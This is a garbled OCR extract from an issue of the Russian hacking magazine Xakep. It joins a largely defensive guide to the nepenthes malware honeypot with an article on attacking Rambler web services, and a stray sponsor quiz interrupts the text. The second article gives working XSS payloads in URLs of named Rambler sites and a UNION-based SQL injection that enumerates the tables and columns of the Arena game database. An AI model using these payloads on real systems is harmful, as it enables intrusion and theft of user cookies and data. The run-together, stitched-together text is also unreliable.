книги хакеры / журнал хакер / 099_Optimized

Общаятеория

Не перелистывай страницу журнала, если не знаешь, что такое malware honeypot или botnet :), я сейчас все объясню. Чаще всего под honeypot для malware подразумевается

low-interactionhoneypot,тоестьханипотыслабо-

гоисреднегоуровнявзаимодействияиэмуляции «средысуществования»червя,предназначенныедляотловавсякогородасетевойнечисти,в томчислеещенеизвестныхмодификацийуже известныхчервей.Перваяреализациявключает всебяиспользование«песочницы»(sandbox). «Песочница»имитируетоперационнуюсистему изапускаетвнейисполняемыйфайл,послечего анализируетизменения,характерныедлявредоносныхпрограмм.Послеисполненияпрограммы антивирусниксканируетсодержимое«песоч- ницы»наприсутствиекаких-либоизменений, которыеможноквалифицироватькакналичие вредоноснойпрограммы,ивыдаетподробный отчетпользователю.

Существует, конечно, достаточно известная техника отлова сетевых червей, которую уже можно отнести к системе высокого уровня взаимодействия. Банально ставится виртуальная машина (vmware, quemu, bochs etc), в которую помещается девственно чистая Windows с доступом в интернет, как вариант подключается к локальной сети в виде ethernet-узла со своим IP (естественно, с этим возникает куча проблем

— договор с провайдером и т.д.), либо вообще пользуемся NAT. Затем наружу транслируем порты вроде RPC DCOM(135), LSASS(445) и т.д.

и, соответственно, порты для централизованного RAT-сервера (если ботмастер управляет червем по HTTP — чаще всего 80 порт, если по IRC — по большей части 6667). Инфу конкретно об используемых backdoor-портах самых распространенных червей можно найти на viruslist.com, хотя с этим тоже могут возникнуть проблемы, ввиду того что каждый мастер волен повесить систему управления HTTP или IRC-ботнетом на любой порт, тогда мы можем нацелиться на отлов только определенного вида заразы. Далее идет банальный снифинг трафика и мониторинг сетевой активности в

системе, ожидающий команды auth от ботмастера и влекущий за собой угон ботнета (об этом уже писал Крис Касперски в одном из номеров «Хакера»). Главное отличие этой реализации от первых двух заключается в том, что она не столь автоматизирована и требует постоянного вмешательства наблюдателя, хотя и цели преследуются другие. Поэтому вышеназванный метод сразу идет лесом: в провайдере, на сеть которого осуществляется атака, никто не будет использовать столь ограниченную реализацию, да и угонять ботнет вряд ли кто из админов станет. Я, главным образом, хочу прояснить ситуацию с тем, как именно это организуется там, в админской обители. Здесь речь идет о более масштабных реализациях, которые

создают виртуальные хосты в заданной подсети, а далее автоматически (или вручную) блокируют заданные адреса для всей подсети провайдера. Конечно же, тема vmware и ей подобных не нова, на эту тему существует много материалов. Далее продолжим без упоминания этого метода.

Парусловобобнаруженииханипотов

А что насчет обнаружения и борьбы с подобными ловушками со стороны червя? О методах борьбы с ханипотами на основе vmware и подобных сказать особо нечего, точнее, не буду повторяться. Антиотладка, обнаружение виртуальной машины, «антинаживки» и прочие классические методы, о которых написано достаточно много; чего стоит только один раздел вирусологии на wasm.ru. Так как принцип

работы ханипота заключается в эмуляции среды существования вирусов, червяков и пр., то, если

вего роли используется реальный хост, боюсь, идентифицировать его будет весьма проблематично. Если же эта самая виртуальная среда

ввиде хоста с бажными демонами эмулируется с помощью, например, honeyd, то обнаружить его можно, анализируя отличия

вповедении его TCP/IP-стека и скриптов, создающих видимость работы на нем различного рода серверного ПО. Так, например, есть сканер winnie, который может определять honeyd вплоть до версии 1.0.

Вот тут лежит статья по этой теме: http://jon. oberheide.org/files/winnie.pdf.СамВинни-Пух лежиттут:http://jon.oberheide.org/projects/winnie.

Пожалуй,этатеманемноготухлая(точнее,применимаонатолькокhoneydвплотьдоверсии1.0),так какоснованаонананесоответствииреализации TCP/IP-стекаhoneydRFC.Вболееновыхверсиях этотбагужепофиксили.Подробнееобэтомможно почитатьввышеназванныхисточниках.

Продолжаемразговор

Надеюсь,досихпоряничегоновоготебенеповедал.Далееречьпойдетодостаточнопростомвис- пользовании,распространенноммалварь-ханипоте для*nix-систем,окоторомвовсемирнойпаутине информацииоченьмало.Проhoneydписать,конеч- но,небуду—темаизбитая(сразужебежимнаwww. securitylab.ru).Расскажулучшеопакетеnepenthes спримеромегонастройкииустановкидлямоей любимойсистемыGentooLinux.Кстати,интересующимсясоветуюпосетитьсайтwww.mwcollect.org— эточто-товродепроектаколлекциисетевойзаразы, собраннойнебезпомощиnepenthesиеестаршего братаHoneyBowSensor.HoneyBow—этоханипот высокогоуровняимитации(иливзаимодействия, еслипереводитьдословно),вотличиеотnepenthes. ОHoneyBow,возможно,ярасскажуследующийраз, таккакрамкистатьинепозволяютмнерассмотреть всесистемы.Чтоже,продолжим.

Червьилибот? Проблемыихобнаружения

Для начала стоит отметить несколько важных фактов. Червь и бот ведут себя, на первый взгляд, абсолютно одинаково: чаще всего целями атаки заразы являются машины под управлением Windows; поиск целей производится путем сканирования различных диапазонов сетей на предмет машин, использующих уязвимые сервисы и приложения. Конкретно уязвимый сервис обнаруживается по закрепленному за ним порту, после чего происходит попытка инфицирования. Главное различие между ботом и червем — это то, что бот имеет некоторый центральный канал управления, который посылает команды на инфицированный

СтатистикавредоносныхпрограммпоКасперскому

"PRIVMSG #ch :[GOOGLE] Trying to exploit http://www. example.com/index.php"

Подводимпромежуточныеитоги.Остаетсяотловитьобразец заразывовремяфактазараженияипринятьмеры,покасетеваянечистьненачаладействовать(например,нанервы)и покагигабайтытрафиканеполилисьнаружувпоискахновых юнитовдляботнетаввидеDDoSнакакой-нибудьнесчаст- ныйинтернет-ресурсилитьмынескончаемыхпредложений купитьчто-нибудьдляувеличенияпениса,выучитьанглий- ский,уклонитьсяотналоговиспатьспокойно…Ужтогда-то будетсовсемпоздно,атвойлюбимыйsnortсможеттолько верещатькакрезаныйпоросенок.Страшно?Мнетоже.

Nepenthes

Какужебылосказано,nepenthes—этоhoneypotнизкогоуровня имитации,работающийподуправлением*nix-серверовиобес- печивающийдостаточнуюфункциональностьдлятого,чтобы одурачитьвредоноснуюначинкучервяилибота,эмулируя стандартныеWindows-сервисы.Nepenthesпытаетсязагрузить вредоносныйкодзаразывсвоехранилище,затемотправляет егонаанализвспециальную«песочницу»коммерческогопродуктаNormanSandbox,которыйэмулируетболее3000WinAPI, инжектированиевпроцесс,многопоточность,множество сетевыхпротоколов(POP3,DNS,IRC,HTTP,ICQ,P2P)ит.д.По истечениикороткогопромежуткавременисистемныйадминистраторполучаетвответготовыйотчетодействияхмалварина свойэлектронныйадрес.Послезараженияатакующийзловред можетпопроситьnepenthesсоединитьсяснекоторымадресом понекоторомупорту,забиндитьпортвсистеме,выполнить какую-либокомандувкоманднойоболочке,скачатьчто-либо вкусноепозаданномуurlилизагрузитьчто-либо,используя некоторыймеханизмпередачифайлов(link,blink,mydoom

итомуподобные).Еслизаразапроситзабиндитьпортили запуститьconnectback,эмуляторвыполняетвсезатребованные действия.Влюбомслучаеконечнойцельюсенсорабудетза- грузкачего-либовкусненькоговсвоечреводляпоследующего анализа,причемэтоможетбытьнеобязательнотелочервяили self-spereadingбота.Самымвкуснымздесьбудутshell-коды. Но это еще не все, ведь можно и ботнет угнать, руководствуясь отчетом Norman Sandbox. Nepenthes получил свое имя достаточно метко — он назван в честь хищного растениямухолова Nepenthes. Вдаваться в тонкости ботаники я не буду; если тебе действительно интересно, отправляйся на http://en.wikipedia.com за более подробной информацией. Конечно, тебе уже не терпится потрогать этот пакет своими руками. Пребилды или преконфигурированные пакеты есть для систем Gentoo, Debian, FreeBSD, OpenBSD.

ДляпользователейDebianтребуетсявсего-навсеговыполнить

1.Кто является пилотом команды

«Spyker» в чемпионате F1?

2.Что есть общего в ассортименте продукции компании Trust

и формулы F1?

3.Какая страна является одновременно родиной компании

«Spyker» F1?

КомпанияTRUST–авторитетныйиизвестныйвЕвропе производительцифровойтехники—предлагаетболее 200разнообразныхпродуктов:мыши,

клавиатуры,web-камеры,фотокамеры,(X)DSLмодемы, сетевыероутеры,адаптерыимногоедругое.

В2007годукомпанияTRUSTявляетсяофициальным спонсоромкомандыSpykerформулыF1.

дляMacOSXиcygwinподWindowsможнопрочитать вReadmeпоnepenthesнаофициальномсайте. Теперьперейдемкнастройке.Первымделомнеобходимоизменитьнекоторыепараметрывфайле

/etc/nepenthes/nepenthes.conf,раскомментиро- вавстроку«"submitnorman.so","submit-norman. conf",""».Этопозволитнамвоспользоваться NormanSandboxдляполучениякопийрезультатов run-timeанализазагруженныхбинарниковна твоюэлектроннуюпочту.Содержимоеsubmitnorman.confдолжновыглядетьпримернотак:

submit-norman

{

// this is the address where norman sandbox reports will be sent

email "shados@real.xakep.ru"; };

Естественно, вместо моего адреса здесь должен быть твой. Далее, добавим nepenthes в автозагрузку на уровень default (для Gentoo):

shados # rc-update add nepenthes default * nepenthes added to runlevel default

[OK]

shados # /etc/init.d/nepenthes start * Starting nepenthes ...

[OK]

Теперь сервис nepenthes будет автоматически стартовать при каждом перезапуске системы. Сразу после запуска в конфигурации по умолчанию nepenthes должен слушать большое количество TCP-/IP-портов, вроде тех, что указаны ниже.

shados # netstat -pa | grep nepenthes

tcp 0 0 *:imaps *:* LISTEN 7596/nepenthes

/ 092

tcp 0 0 *:pop3s *:* LISTEN 7596/nepenthes tcp 0 0 *:3140 *:* LISTEN 7596/nepenthes tcp 0 0 *:epmap *:* LISTEN 7596/nepenthes tcp 0 0 *:5000 *:* LISTEN 7596/nepenthes tcp 0 0 *:nameserver *:* LISTEN 7596/ nepenthes

Вывод урезан для удобства, но среди всех открытых портов ты обязательно обнаружишь твои любимые 445, 135, 3140, если, конечно, они чем-нибудь не заняты (например, 135 — samba). Поэтому для целей ханипота желательно использовать выделенную машину, а все явно светящиеся порты, не относящиеся к эмуляции Windows, необходимо извне прикрыть (-j DROP) с помощью iptables, так как они могут выдать honeypot с ушами при обычном сканировании nmap'ом. Но об этом позже.

Будемсчитать,чтотеперьвсеготовокиспользованию,таккаксостальнымимелкиминюансами тысамвполнесможешьразобраться,обложившисьдокументациейидотошновкуриваяman nepenthesиmannepenthes.conf.Есливсесвои изысканиятыпроводишьвинтернете,аневмаленькойлокалке,точерезнесколькоминутсенсор nepenthesзапишетв/var/log/nepenthes/logged_ downloadsи/var/log/nepenthes/nepenthes.log

первуюинформацию(взависимостиотнастройки ведениялогов).Например,вlogged_downloads можнобудетувидетьследующиезаписи.

shados # tail -n 3 ./logged_downloads [2007-01-09T10:06:52] xxx.xxx.78.158 -> yyy. yyy.136.243 tftp://xxx.xxx.78.158/config.exe [2007-01-09T11:47:19] xxx.xxx.137.89 -> yyy. yyy.136.243 tftp://xxx.xxx.137.89/ctfmom.exe [2007-01-09T12:39:07] xxx.xxx.144.212 -> yyy. yyy.136.243 ftp://1:1@xxx.xxx.144.212:29154/ eraseme_35862.exe

Надеюсь, их смысл здесь вполне понятен. Далее админу самому решать, блокировать ли эти адреса или собирать коллекцию заразы, которая приходит с них. Все загруженные файлы хранятся в папке /var/lib/ nepenthes/binaries с именами в виде их md5 сумм:

shados # ls -lah

—  rw-r--r-- 1 nepenthes nepenthes 1.3M Dec 25 05:07 fa96d82f8a00d32ed14064115 3714715

—  rw-r--r-- 1 nepenthes nepenthes 94K Jan 4 01:42 fdb99325e908b93da353cd2661 823b7e

—  rw-r--r-- 1 nepenthes nepenthes 57K Dec 25 02:52 ff211ee0d9313bdaa1cdd9540 955bd19

Каждый такой файл прямиком отправляется в «песочницу» к Норману ;), а в качестве отчета приходит письмо следующего содержания:

ОтчетдляIRC-бота

Backdoor.Win32.Rbot.gen

nepenthes-eac5fd7b9d8172ecd1fc1 a5d950e441e-MSSDEV.EXE : W32/ Spybot.gen4 (Signature: W32/Spybot. BDAU)

[ General information ]

*File length: 141824 bytes.

*MD5 hash: eac5fd7b9d8172ecd1fc1 a5d950e441e.

[ Changes to filesystem ]

*Creates file C:\WINDOWS\SYSTEM32\ MSSDEV.EXE.

*Deletes file 1.

xàêåð 03 /99/ 07

Маг

/ mag@wapp.ru, icq 878477 /

XSSдляразгона

ПервымделомярешилпоискатьXSS-багипроек- та,таккакоченьсомневалсявсуществованиибо- леекрупных,подобныхsql-инъекциямит.п.(как выяснитсяпозже,яглубокозаблуждался:)).Зайдя наГугл,яввелдляпоискастроку«site:rambler.

rufiletype:php»инемногопоходилповыданным результатам.Срединихбылсайтнекойигрушки DestinySphere.Побродивпонему,янаткнулся насайтalpha.destinysphere.ru(ксожалению,

альтернативнойссылкисРамблеранаэтотресурс нет).Немудрствуялукаво,яскопипастилпервую попавшуюсяссылкусразускавычкой:

http://alpha.destinysphere.ru/

?p=newsweek&pubId=231&pubMode= showPub '

На это система мне выдала:

Message: From object Parametrs

— Value [showPub] is incorrect for recived parameter [pubMode] by type.

Это уже было интересно :). Чуть-чуть поизвращавшись с этим параметром, я понял, что ничего серьезного из него не выжать,

ипросто подставил в pubMode значение showPub «<script>alert(document.cookie)</ script>», на что браузер показал мне мои плюшки :).

Кстати, движок этого сайта был таким же, как

иds.rambler.ru, но XSS-баг работал только

в нем.

Ошибкискриптов

Следующим моим запросом в Гугле был «site: rambler.ru error». Таким образом можно посмотреть ошибки скриптов Рамблера :). Поисковик сразу выдал целую тучу ссылок, где присутствовало, например, такое:

error while executing /www/ face.html: Can't call method «prepare» on an undefined value at /usr/local/project/faces/ perl/Content/StableDBI.pm line 74 (people.rambler.ru/face. html?s=35&year=2002)

Но все подобные баги остались лишь в кэше Гугла. Единственная непофиксенная страница

Логины пользователей в «Арене»

— это http://horoscopes.park.rambler.ru/fortune.html, перей-

дя на которую, наблюдаем:

error: Can't call method «name» on an undefined value at /home/horo2/source/ comps/www/fortune.html line 16.

context:

...

12:<tr><td valign="top">

13:<div style="padding: 0px 0px 0px 0px; width: 190px; float: left">

14:<& «components/runa_nav.msn», id=>$id, sec=>$sec &>

15:</div>

16:<b><% $doc->name %></b>

17:<div align="justify">

18:% if ((!defined $sec) or (defined $id)) {

19:<% $doc->text %>

20:<a href="#top">Наверх</a>

...

code stack: /home/horo2/source/comps/ www/fortune.html:16 /home/horo2/source/comps/autohandler:14

Если будет время, можешь разобраться с ней сам. Я же забил и стал искать более существенные баги :).

XSSназакуску

Теперь поищем XSS-дырки посерьезнее на остальных проектах Рамблера. Первым делом зайдем на «RamblerФинансы» (finance.rambler.ru). Сразу бросается в глаза несколько окошек, связанных с котировками валют и прочими солидными фишками. Вводим в окошко «Найти котировку» кавычку, и что мы видим? Кавычка не экранируется! Далее пишем «<script>alert(document.cookie)</script>» и наблю-

даем свои печенюшки и информацию о том, что котировка не найдена =). Чтобы сделать использование XSS более удобным, находим нужный нам параметр в html-коде документа и получаем следуюшую ядовитую ссылку:

http://finance.rambler.ru/db/instrsearch.

html?words=<script>alert(document.

cookie)</script>,

В нее можно внедрить любой код для исполнения на стороне клиента.

XSS в играх на Рамблере

Следующий объект исследования — «Rambler-Игры» (games.rambler.ru). Здесь мы можем использовать XSS-баг на странице авторизации http://games.rambler.ru/ login.html. Просматривая html-код страницы, можно наткнуться на hidden-параметр back, в котором хранится адрес страницы. На нее пользователь перейдет сразу после авторизации.

Итак, сооружаем ссылку:

http://games.rambler.ru/login.html?ba

ck="><script>alert(document.cookie)</

script><»,

После перехода по ней видим свои куки :). Как и в предыдущей дырке, здесь тоже не экранируются кавычки.

SQLнасладкое

Итак, теперь самое вкусное :). У Рамблера есть очень и очень известная игрушка «Арена» (arena.rambler.ru или arena.ru), в которую гамят постоянно до тысячи человек онлайн. Начав исследование этого проекта, я наткнулся на базу знаний «Арены» (описание скиллов, NPC, оружия, вещей и т.д.) по адресу kb.arena.rambler.ru. Немного поизучав ссылки, я соорудил такой запрос:

http://kb.arena.rambler.ru/objects.

php?it=CR'

И получил mssql-ошибку:

Warning: mssql_query(): message: Unclosed quotation mark after the character string 'CR\' ) and Quested < 1 order by ItemLevel '. (severity 15) in /home/kb.arena.ru/web/ objects.php on line 133

Warning: mssql_query(): message: Incorrect syntax near 'CR\' ) and Quested < 1 order by ItemLevel '. (severity 15) in /home/ kb.arena.ru/web/objects.php on line 133 Warning: mssql_query(): Query failed in /home/kb.arena.ru/web/objects.php on line 133

Это не могло не радовать :). Но теперь следовало выжать из этой дыры хоть какую-то пользу. Кавычки, как видно из информации об ошибке, экранировались. Но это не помешало мне составить следующий запрос:

http://

http://rambler.ru

—интернет-холдинг

Rambler http://arena.ru—баж-

ныйпроектРамблера.

!

Всеописанное встатьеявляется плодомбольного

воображенияавтора. Любыесовпадения ссуществующимисайтамислучайны.

Список всех полей в БД «Арены»

Значит, несмотря на экранирование кавычек, запросы к базе все же можно выполнять :). Теперь подбираем количество полей в БД:

http://kb.arena.rambler.ru/ objects.php?it=CR') union select NULL,NULL,NULL,NULL,null,null,n ull,null,null,null,null,null,nu ll,null,null,null,NULL--

Этот запрос не вызывает ошибки с различным количеством полей в БД и использовани-

ем UNION. Количество полей подобрано. Теперь нам необходимо узнать названия таблиц. В MsSQL все они хранятся в табли-

це INFORMATION_SCHEMA.TABLES в поле

TABLE_NAME. Исходя из этого, составляем запрос:

,null,TABLE_NAME,null,null,nul l,null,null,null,null,null,nu ll,null,NULL FROM INFORMATION_ SCHEMA.TABLES—

И получаем список из названий таблиц. Дальше неплохо было бы узнать и названия полей из найденных таблиц. К сожалению, из-за экранирования кавычек нельзя вывести поля из одной определенной таблицы (запрос «WHERE='таблица'» просто выдаст ошибку и не выполнится), но вполне возможно вывести их все сразу. В MsSQL эта информация хранит-

ся в INFORMATION_SCHEMA.COLUMNS в поле

COLUMN_NAME. Составляем новый запрос:

http://kb.arena.rambler.ru/ objects.php?it=CR') union select NULL,NULL,NULL,NULL,null,COLU MN_NAME,null,null,null,null,n ull,null,null,null,null,null, NULL FROM INFORMATION_SCHEMA.